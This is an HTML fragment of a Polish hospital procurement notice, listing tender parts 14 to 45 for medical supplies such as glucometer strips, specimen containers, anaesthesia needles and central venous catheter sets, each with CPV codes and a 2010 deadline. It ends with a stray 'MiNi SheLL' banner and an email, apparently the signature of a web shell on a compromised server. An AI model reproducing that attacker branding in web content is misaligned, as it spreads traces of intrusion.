<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet nr 3.12.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.12 - paski do glukometru Ascensia Entrust- 50 op.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.31-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet nr 3.13.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.13 paski do glukometru One Touch Horizon- 200 op.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.31-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet nr 3.14.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.14 - paski do glukometru Accu Chek Activ- 32op.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.31-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet nr 3.15.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.15- paski do glukometru Accu Chek Go- 20op.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.31-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet nr 3.16.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.16- paski do glukometru Medi Sense- 20op.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.31-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet nr 3.17.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.17- paski do glukometru Optium Xido- 6 op.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.31-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pakiet nr 3.18.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.18- pojemnik PS na bad. histopatologiczne 100ml - 1000szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.94.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pakiet nr 3.19.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.19- pojemnik PS na bad. histopatologiczne 200ml - 1000szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.94.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Pakiet nr 3.20.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.20 pojemnik PS na bad. histopatologiczne 2000ml - 200szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.94.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Pakiet nr 3.21.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.21 pojemnik PS na bad. histopatologiczne 5000ml - 100szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.94.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Pakiet nr 3.22.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.22- dren typu REDON - 400szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Pakiet nr 3.23.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.23- kieliszki jednorazowe - 40 000szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Pakiet nr 3.24.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.24- opaska do identyfikacji dorosłych - 3100szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.45.51.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Pakiet nr 3.25.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.25- opaska do identyfikacji noworodków- 7000szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.45.51.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Pakiet nr 3.26.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.26- worek rozpuszczalny w wodzie - 4000szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Pakiet nr 3.27.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.27- rękawice medyczne - 300 op (op=50 par).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Pakiet nr 4.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 4 -  wyroby foliowe - 13 pozycji asortymentowych. Wymagane złożenie oferty na każdą pozycję asortymentową..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.17.40.00-0, 18.93.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Pakiet nr 5.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 5 -  materiały stomatologiczne - 20 pozycji asortymentowych. Wymagane złożenie oferty na każdą pozycję asortymentową..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.13.00.00-0, 33.13.13.00-0, 33.13.16.00-3, 33.13.30.00-1, 33.31.41.85-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> Pakiet nr 6.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 6-  igły pencil point- 5 pozycji asortymentowych. Wymagane złożenie oferty na każdą pozycję asortymentową..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.28-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 33 <b>NAZWA:</b> Pakiet nr 7.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 7-  igły do znieczulenia, stymulacji - 3 pozycji asortymentowych. Wymagane złożenie oferty na każdą pozycję asortymentową..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.28-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 34 <b>NAZWA:</b> Pakiet nr 8.1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 8.1-  igły typu Tuohy - 400szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 35 <b>NAZWA:</b> Pakiet nr 8.2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 8.2-  igły do stymulacji nerwów przy znieczuleniach splotu - 200szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 36 <b>NAZWA:</b> Pakiet nr 8.3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 8.3 -  igły specjalne do znieczuleń podpajęczynówkowych - 600szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.28-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 37 <b>NAZWA:</b> Pakiet nr 8.4.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 8.4 -  zestaw do cewnikowania żył centralnych - 200szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.40-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 38 <b>NAZWA:</b> Pakiet nr 8.5.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 8.5 -  zestaw do cewnikowania żył centralnych met. Seldingera- 1000szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.40-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 39 <b>NAZWA:</b> Pakiet nr 8.6.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 8.6-  zestaw do cewnikowania żył centralnych met. Seldingera- 500szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.40-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 40 <b>NAZWA:</b> Pakiet nr 8.7.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 8.7-  zestaw do znieczulania zewnątrzoponowego- 400szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.13.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 41 <b>NAZWA:</b> Pakiet nr 8.8.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 8.8 -   zestaw do znieczulania zewnątrzoponowego, mały - 100szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.13.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 42 <b>NAZWA:</b> Pakiet nr 8.9.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 8.9 -   zestaw do cewnikowania żył centralnych, 2 kanałowy - 200szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.28-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 43 <b>NAZWA:</b> Pakiet nr 8.10.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 8.10 -   zestaw do konikotomii - 200szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 44 <b>NAZWA:</b> Pakiet nr 8.11.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 8.11 -   prowadnica do trudnych inrubacji - 40szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 45 <b>NAZWA:</b> Pakiet nr 8.12.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 8.12 -   prowadnica do igieł podpajęczynówkowych- 400szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com